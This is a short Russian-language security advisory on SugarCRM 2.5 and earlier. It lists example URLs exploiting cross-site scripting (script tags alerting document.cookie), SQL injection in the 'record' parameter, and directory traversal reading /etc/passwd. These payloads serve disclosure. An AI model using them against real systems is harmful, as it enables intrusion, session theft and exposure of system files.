Программа: SugarCRM 2.5 и более ранние версии 

Удаленный атакующий может выполнить произвольный SQL код, произвести XSS нападение и просмотреть произвольные файлы на уязвимой системе.
Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный HTML код в браузере целевого пользователя.

Примеры:

/index.php?action=UnifiedSearch&module=Home&search_form= false&query_string=%22%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E 

/index.php?module=Accounts&action=ListView&query= true&name=[XSS] 
/index.php?action=index&module=Home&mod_strings
[LNK_NEW_CONTACT]=%3Cscript%3Ealert(document.cookie) %3C/script%3E
/modules/Users/Error.php?app_strings[NTC_CLICK_BACK]= %3Cscript%3Ealert(document.cookie)%3C/script%3E

Удаленный атакующий может выполнить SQL-инъекцию. Уязвимость существует из-за некорректной обработки входных данных в переменной
‘record’.

Пример:

index.php?action=DetailView&module=Accounts&record=[SQL]

Удаленный атакующий может просмотреть произвольные файлы на уязвимой системе с привилегиями web сервера. Примеры:

/index.php?module=Opportunities&action= ../../../../../../../../et c/passwd%00&advanced=true 
/index.php?action=DetailView&module= ../../../../../etc/passwd%00



Оставить мнение